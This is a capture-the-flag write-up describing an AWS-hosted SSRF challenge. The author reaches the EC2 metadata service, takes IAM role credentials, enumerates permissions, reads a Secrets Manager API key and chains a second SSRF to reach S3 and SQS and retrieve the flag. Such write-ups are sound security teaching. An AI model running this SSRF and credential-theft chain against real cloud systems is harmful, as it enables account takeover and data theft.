HackerOne announced a time-limited CTF with AWS between April 5 and April 12, 2021. I thought http://flaws.cloud and http://flaws2.cloud were excellent preparation for completing this CTF. The CTF awarded 26 points on HackerOne’s CTF platform, which results in an invitation to a private bug bounty program (well, results in a spot on a queue for private invitations). It took me about one hour to complete the challenge and find the flag.
After registering and taking way too long to locate the HackerOne CTF landing site, I was presented with this application:
I ran a few tests with https://www.google.com and other sites to understand what the application was doing.
With https://google.com
, I received an alert on the page that a 200 response was received, but the page did not respond.
With https://www.google.com
, the application loaded the website inside the iframe.
Behind the scenes in Burp, the application was responding with a status code and a base64-encoded response from the website.
If I looked at the source code on the webpage, I saw one script import to /static/main.js
with the following content:
document.getElementById("submit").onclick = function() {
let webpage_address = document.getElementById("url_input").value;
fetch(`/api/check_webpage?addr=${webpage_address}`)
.then((response) => response.json())
.then((data) => {
// handle error cases
if("err" in data) {
alert(data["err"]);
return;
}
if(parseInt(data["status"]) === 200) {
document.getElementById("preview").src = `data:text/html;base64,${data["page"]}`;
} else {
alert("Page did not respond with '200 OK' but was reached.")
}
})
};
So the app would attempt to display the result of any webpage I give it? Nice! Just to confirm what I was seeing, I entered a Burp Collaborator address. Sure enough:
The first thing I want to try is the instance metadata URL - http://169.254.169.254/
.
Oh boy!
This is a server-side request forgery (SSRF) vulnerability. I trick the application into making a second HTTP request, targeting a hostname that I cannot access but that the server can. SSRF does not always result in input back to the user (see blind SSRF in the link above), but thankfully it does in this case :)
Instance metadata resides on every EC2 instance (unless disabled) at http://169.254.169.254/
as a local loopback address.
I actually wrote an article about how AWS added a mitigation to SSRF against instance metadata via version 2 of the instance metadata service (IMDSv2).
I’ll throw in a link to the Terraform parameter you want to set if you build infrastructure that way.
I proceeded with the result of the IMDSv1 query to retrieve instance credentials off of this server.
The instance profile attached to the server is SSRFChallengeOneRole
.
Now I know the name of the instance profile attached to this server and can retrieve the instance profile credentials.
I had what I needed to access the AWS account.
Since this was a CTF and I could be as noisy as I’d like, my first step was to download weirdAAL and configure my credentials. I stored the instance profile credentials in my ~/.aws/credentials
file under the ctf1
profile, so I merely needed to export AWS_SHARED_CREDENTIALS_FILE
and AWS_PROFILE
in order to configure weirdAAL after installation. I also set up the repo in a pipenv
environment.
Inside the pipenv shell
, I ran the following to brute force identify what permissions these credentials have on AWS. weirdAAL doesn’t cover all AWS API requests but it covers a good amount of the main stuff.
python weirdAAL.py -m recon_all -t aws-ctf
I could then view the permissions on this instance profile:
Secrets Manager?
That looks juicy.
Since I had ec2.DescribeInstances
as well, I took a quick look at what servers we have in this account.
After a bit of trial and error I realized the servers are hosted in us-west-2.
You could probably also figure that out by running dig
on the personal hostname generated for you by the CTF challenge and correlating it to https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html, but I wasn’t in the mood.
After looking over the full response and then refining my request, I ended up with this query that displayed the data that I found interesting:
aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Tags[?Key==`Name`].Value,InstanceId,NetworkInterfaces[*].PrivateIpAddress]'
Notably, there were 3 challenge one servers and 1 “ChallengeTwo” server.
I guessed I needed to gain access to the challenge two server.
I noted it had a private IP address - 10.0.0.55
.
Another internal hostname I could target with SSRF…
Sure enough, entering http://10.0.0.55/
on the application resulted in a response. I didn’t get anything loaded in the iframe, but by inspecting the response I saw that my request was missing an api_key
parameter.
I assumed this was a missing query parameter (as opposed to other parameters), but I wasn’t sure what value to provide. This is when I remembered that my credentials had access to list secretsmanager.
Flags!
Unfortunately, I did not have permissions to describe h101_flag_secret_secondary
or h101_flag_secret_main
.
However, I could run describe-secret
on web_service_health_api_key
and get its secret value.
Hey, didn’t I just get asked to provide an API key?
I added this to my web request with ?api_key=<apikey>
and the service returned a good response:
Hmm, what do we have here?
I took a look at the HTML source for the iframe
by right-clicking inside the window and selecting “View frame source.”
That resulted in the following content:
<!DOCTYPE html>
<html lang="en">
<head>
<title>SERVICE HEALTH MONITOR</title>
<style>
.ok {
color: green;
}
.err {
color: red;
}
</style>
<script>api_key = "hXjYspOr406dn93uKGmsCodNJg3c2oQM";</script>
</head>
<body>
<h1>MACHINE STATUS</h1>
<table id="status_table">
<tr>
<th>ADDR</th>
<th>STATUS</th>
</tr>
</table>
</body>
<script src="/static/main.js"></script>
</html>
All right, so it is embedding my API key and then presumably doing something in /static/main.js
.
Let’s take a look at what that is:
Inspecting the iframe source again made the file content more readable:
function fetch_machines() {
return authenticated_fetch(`/api/get_machines`);
}
function fetch_system_status(addr) {
return authenticated_fetch(`/api/get_status?addr=${addr}`);
}
function authenticated_fetch(addr) {
let separator = addr.includes("?") ? "&" : "?";
return fetch(`${addr}${separator}api_key=${api_key}`);
}
fetch_machines()
.then((result) => result.json())
.then((machine_addrs) => {
machine_addrs.forEach((addr) => {
fetch_system_status(addr)
.then((result) => result.json())
.then((data) => {
let status_table = document.getElementById("status_table");
let status_row = document.createElement("tr");
let machine_addr = document.createElement("td");
machine_addr.textContent = addr;
let machine_status = document.createElement("td");
machine_status.textContent = data["success"] ? "OK" : "UNREACHABLE";
machine_status.className = data["success"] ? "ok" : "err";
status_row.appendChild(machine_addr);
status_row.appendChild(machine_status);
status_table.appendChild(status_row);
})
});
});
So the script attempts to run fetch_machines
and populate the data in the iframe.
When I attempted to query /api/get_machines?api_key=<apikey>
myself, I received a 500 error from the server.
I took that to mean that endpoint is intentionally (unintentionally?) not working, or at the very least I didn’t know what I needed to supply in order to receive a correct response.
However, the /api/get_status
endpoint is interesting…
Ok, so similar to the request that is made by the current application (an API request with an addr
query parameter), I needed to supply another addr
for the second server.
Could this be… SSRF inception??
Yup.
Notably, you want to URL-encode the &
parameter (%26
) and leave off http://
on the instance metadata URL in order to get a successful response.
The ChallengeTwo server was using the instance profile SSRFChallengeTwoRole
:
I finished the SSRF payload to retrieve credentials for this role and added another profile to my aws credentials file.
Because the data returns in a JSON object in the request, you have to un-escape characters in the response.
I found the easiest way was to pipe the content into jq
and let it give me the data.
I ran weirdAAL on these new credentials to see what I could do:
I could no longer describe EC2 instances, but I could list S3 buckets and I could still list secrets!
I still couldn’t describe h101_flag_secret_main
but I was able to retrieve the value inside h101_flag_secret_secondary
.
I am still not sure what that value was for.
Maybe to correlate to part of the final flag at the end?
In any case, I didn’t find a use for this value.
Now, let’s try to list S3 Buckets…
I couldn’t list the contents of h101-flag-files
(although that doesn’t mean I can’t retrieve files from this bucket if I know the exact path, as we will see later).
I also couldn’t list h101ctfloadbalancerlogs
, but I wasn’t interested in those logs.
In h101-dev-notes
, I found a README.md
file and downloaded it.
# Flag Generation
This document outlines the steps required to generate a flag file.
## Steps
1. Fetch your `hid` and `fid` values from the `/api/_internal/87tbv6rg6hojn9n7h9t/get_hid` endpoint.
2. Send a message to the SQS queue `flag_file_generator` with the following format
```json
{"fid": "<fid>", "hid": "<hid>"}
```
where `<fid>` and `<hid>` are the values you received in step 1.
3. Get the `<fid>.flag` file from the `flag-files` (name may be slightly different) S3 bucket.
## Tips
If you've never worked with SQS (Simple Queue Service) before then the [following link](https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message.html)
may be helpful in sending messages from the aws cli tool.
Instructions on how to generate my flag!
I had to make a new SSRF request to receive fid
and hid
values.
I pass those values as a message to an SQS queue.
This queue triggers the creation of a flag file in the h101-flag-files
bucket, at which point it seems I can make a direct copy request to retrieve the flag.
Now, I didn’t see SQS permissions in my readout from weirdAAL, but that may be a service that isn’t fully covered by the tool - I didn’t check.
I figured that if the instructions told me to do it, I would have the permissions.
Let’s go.
With these values saved to a file, I now need to determine what SQS queue to send the message to.
I know the name of the queue is flag_file_generator
so:
Now I can send the message:
I got the flag!
Inside this file was a flag to submit to the AWS CTF challenge page that resulted in a HackerOne CTF flag to submit to the main CTF page.